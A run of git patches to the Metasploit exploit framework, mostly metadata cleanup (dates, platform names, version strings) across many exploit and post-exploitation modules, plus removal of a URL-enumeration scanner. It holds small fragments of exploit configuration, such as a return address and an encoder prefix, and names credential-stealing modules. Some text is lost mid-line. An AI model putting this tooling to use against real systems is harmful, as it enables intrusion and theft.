a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index f919f9b3c8..3788b2c7ee 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Local 'References' => [ [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], - 'DisclosureDate'=> "Dec 31, 2010" + 'DisclosureDate'=> "Dec 31 2010" )) end diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index a4e7fe8da9..cc1733a38e 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Local [ 'Automatic', { } ], ], 'DefaultTarget' => 0, - 'DisclosureDate'=> "Oct 15, 2012" + 'DisclosureDate'=> "Oct 15 2012" )) register_options([ diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index ab89caf331..50b342259e 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jul 11 2005 ')) + 'DisclosureDate' => 'Jul 11 2005')) register_options([ Opt::RPORT(25) ], self.class) end diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index d6fde61719..06ef199e58 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Post 'References' => [ [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], - 'DisclosureDate'=> "Dec 31, 2010" + 'DisclosureDate'=> "Dec 31 2010" )) register_options([ From c17b026db9e6318d0e9dcbae79d9171ba5ad0053 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 20:14:39 +0200 Subject: [PATCH 21/74] Platform cleanup: platform should be lowercase --- modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 2 +- modules/post/windows/manage/mssql_local_auth_bypass.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 13026d076a..98cb5833df 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x83\xec\x7f", 'DisableNops' => 'True', }, - 'Platform' => 'BSD', + 'Platform' => 'bsd', 'Arch' => ARCH_X86, 'Targets' => [ diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 1e902fa457..fa602e08a6 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post However, this can be overcome by migrating to the SQL Server process.}, 'License' => MSF_LICENSE, 'Author' => [ 'Scott Sutherland '], - 'Platform' => [ 'Windows' ], + 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) From 3bf612aec8ba8d51722a58d0ea155e53242b4a42 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 20:28:02 +0200 Subject: [PATCH 22/74] Arch/Platform cleanup: aux modules need neither --- modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb | 1 - modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb | 1 - modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb | 1 - modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb | 1 - modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb | 1 - 5 files changed, 5 deletions(-) diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb index 57f8dcad50..47d57073a7 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'jduck', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'Platform' => [ 'win' ], 'References' => [ [ 'OSVDB', '65533'], diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 828ffee880..eb8924aea7 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'nullbind ' ], 'License' => MSF_LICENSE, - 'Platform' => [ 'win' ], 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]] )) diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index 203587be41..b6c9dba312 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary [ 'Automatic', { } ], ], 'DefaultTarget' => 0, - 'Platform' => [ 'win' ], 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]] )) diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 403e11c6da..c45bc2aa67 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary Code execution may be possible however this module is only a DoS. }, 'Author' => [ 'patrick' ], - 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index 3365bd54ef..0d6967348a 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Auxiliary [ 'EDB', 15803 ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ] ], - 'Platform' => [ 'win' ], 'DisclosureDate' => 'Dec 21 2010')) register_options( From 595d0821c58da594ddbbfe379db60cf7808fd0be Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 20:36:49 +0200 Subject: [PATCH 23/74] Privileged cleanup: auxiliary modules can't --- modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb | 1 - modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 1 - 2 files changed, 2 deletions(-) diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb index 47d57073a7..e25693f213 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '65533'], [ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ] ], - 'Privileged' => true, 'DisclosureDate' => 'Jun 15 2010' ) diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 6cb8a84a35..28f0f916b1 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -45,7 +45,6 @@ class Metasploit3 < Msf::Auxiliary ['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1'] ], # Tested OK against sol8.tor 20100624 -jjd - 'Privileged' => true, 'DisclosureDate' => 'Jan 22 2003') register_options( From d38629275410d2c341ad9f24f06cc30c87022d92 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Mon, 22 Oct 2012 14:46:52 -0400 Subject: [PATCH 24/74] remove non-functional enum_delicious module --- .../auxiliary/scanner/http/enum_delicious.rb | 112 ------------------ 1 file changed, 112 deletions(-) delete mode 100644 modules/auxiliary/scanner/http/enum_delicious.rb diff --git a/modules/auxiliary/scanner/http/enum_delicious.rb b/modules/auxiliary/scanner/http/enum_delicious.rb deleted file mode 100644 index a04c7fc52c..0000000000 --- a/modules/auxiliary/scanner/http/enum_delicious.rb +++ /dev/null @@ -1,112 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'net/http' - -class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Del.icio.us Domain Links (URLs) Enumerator', - 'Description' => %q{ - This module pulls and parses the URLs stored by Del.icio.us users for the - purpose of replaying during a web assessment. Finding unlinked and old pages. - }, - 'Author' => [ 'Rob Fuller ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) - - register_options( - [ - OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), - OptString.new('OUTFILE', [ false, "Where to output the list for use"]) - ], self.class) - - register_advanced_options( - [ - OptString.new('PROXY', [ false, "Proxy server to route connection. :",nil]), - OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]), - OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil]) - ], self.class) - - end - - def pull_urls(targetdom) - response = "" - list = [] - lastpage = 0 - pagenum = 1 - while lastpage == 0 - print_status("Page number: " + pagenum.to_s) - header = { 'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"} - clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.delicious.com") - resp = clnt.get2("/search?p=site%3A"+targetdom+"&page="+pagenum.to_s,header) - response << resp.body - response.each_line do |line| - list << line.gsub!(/(.+ Date: Mon, 22 Oct 2012 20:53:17 +0200 Subject: [PATCH 25/74] Version cleanup Remove all values that are neither 0 nor $Revision$. --- modules/auxiliary/gather/d20pass.rb | 2 +- modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb | 2 +- modules/auxiliary/scanner/h323/h323_version.rb | 2 +- modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb | 2 +- modules/auxiliary/server/capture/drda.rb | 2 +- modules/auxiliary/server/http_ntlmrelay.rb | 3 +-- modules/auxiliary/vsploit/pii/web_pii.rb | 2 +- modules/encoders/x86/context_cpuid.rb | 2 +- modules/exploits/linux/http/webid_converter.rb | 2 +- modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb | 2 +- modules/exploits/multi/http/jboss_deploymentfilerepository.rb | 2 +- .../multi/http/struts_code_exec_exception_delegator.rb | 2 +- .../exploits/windows/browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../exploits/windows/browser/viscom_movieplayer_drawtext.rb | 2 +- modules/exploits/windows/fileformat/csound_getnum_bof.rb | 2 +- modules/exploits/windows/fileformat/foxit_reader_launch.rb | 2 +- modules/exploits/windows/fileformat/mini_stream_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/mplayer_sami_bof.rb | 2 +- .../exploits/windows/fileformat/orbit_download_failed_bof.rb | 1 - modules/exploits/windows/fileformat/vlc_realtext.rb | 2 +- modules/exploits/windows/http/bea_weblogic_post_bof.rb | 2 +- .../windows/http/landesk_thinkmanagement_upload_asp.rb | 2 +- modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb | 2 +- .../misc/citrix_streamprocess_get_boot_record_request.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_footer.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_objects.rb | 2 +- modules/exploits/windows/misc/gimp_script_fu.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_new_folder.rb | 2 +- modules/post/multi/manage/sudo.rb | 2 +- modules/post/windows/gather/credentials/imvu.rb | 2 +- modules/post/windows/gather/credentials/outlook.rb | 2 +- 31 files changed, 30 insertions(+), 32 deletions(-) diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index cee450d9c1..43df04d3d7 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'K. Reid Wightman ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 1 $', + 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012' )) diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 374eb2aeb3..bc32a33858 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Link Local/Node Local Ping Discovery', - 'Version' => '$Revision: 13962 $', + 'Version' => '$Revision$', 'Description' => %q{ Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds. }, diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 894c068fb2..46996d1f8f 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'H.323 Version Scanner', - 'Version' => '$Revision: 9804 $', + 'Version' => '$Revision$', 'Description' => 'Detect H.323 Version.', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 59a3fc7750..3d479efee3 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access', - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 32af81f035..b71f9f1ce8 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)', - 'Version' => '$Revision: 14774 $', + 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake DRDA (DB2, Informix, Derby) server that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index a23072a310..2edb6392ec 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client MS Credential Relayer', - 'Version' => '$Revision:$', + 'Version' => '$Revision$', 'Description' => %q{ This module relays negotiated NTLM Credentials from an HTTP server to multiple protocols. Currently, this module supports relaying to SMB and HTTP. @@ -52,7 +52,6 @@ class Metasploit3 < Msf::Auxiliary [ 'Rich Lundeen ', ], - 'Version' => '$Revision:$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index f9b95c8381..7126189bb4 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => 'This module emulates a webserver leaking PII data', 'License' => MSF_LICENSE, 'Author' => 'MJC', - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com'], diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index 860937d9f4..bd854efa4e 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'CPUID-based Context Keyed Payload Encoder', - 'Version' => '$Revision: 1$', + 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai. }, diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 585540d1c9..5f0eae911d 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '73609' ], [ 'EDB', '17487' ] ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 8fc2b9b5b6..731b59e1cb 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Brendan Coles ', # Discovery and exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3 $', + 'Version' => '$Revision$', 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 7e84e55847..053fccccc1 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof', 'h0ng10' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 15620 $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 5a07039eb5..e33e0fa926 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'mihi' # ARCH_JAVA support ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0391'], diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index c759aa93b1..236ec13602 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'EDB', 15668 ], diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index 2fbbd82d1b..cd1c6320ed 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0356' ], diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index ad1551a1ce..11390576f6 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Secunia', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0270' ], diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 698771cb47..a698daff98 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Francisco Falcon', # Discovery 'bannedit' # Metasploit module ], - 'Version' => '$Revision: 14069 $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0837' ], diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 7b33f47358..93ac7c5917 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Tiago Henriques', # metasploit module 'James Fitts' # clean ups ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'EDB', 14373 ], diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 3de93967df..c3e4fcba29 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Jacques Louw', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'BID', '49149' ], diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index d48d783b55..443b575891 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Diego Juarez', # Vulnerability discovery 'juan vazquez', # Metasploit module ], - 'Version' => '$ $', 'References' => [ [ 'BID', '28541' ], diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index 79f2e33021..7cec8a7364 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'SkD', # Exploit 'juan vazquez' # Metasploit Module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '49809' ], diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 128c522cb0..5c9eafb89f 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'KingCope', # Vulnerability Discovery and PoC 'juan vazquez', # Metasploit Module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3257' ], diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index 3f9a422f48..31261e648b 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index 60a80569ee..9265d98094 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'AbdulAziz Hariri', # Initial discovery via ZDI 'alino <26alino[at]gmail.com>' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 12ee128f78..2dc4ce226a 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 004e550e1e..33f13c20a2 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index ed92d421d6..bb92d02b25 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 6fb3a43ed0..8e96415b39 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Joseph Sheridan', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-2763' ], diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index fea85b7d75..6d97fb05b5 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez', 'sinn3r' ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0124' ], diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index b1d654989c..f80cbb92d3 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'todb '], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 1caebb1051..6c27b0d04e 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -34,7 +34,7 @@ class Metasploit3 < 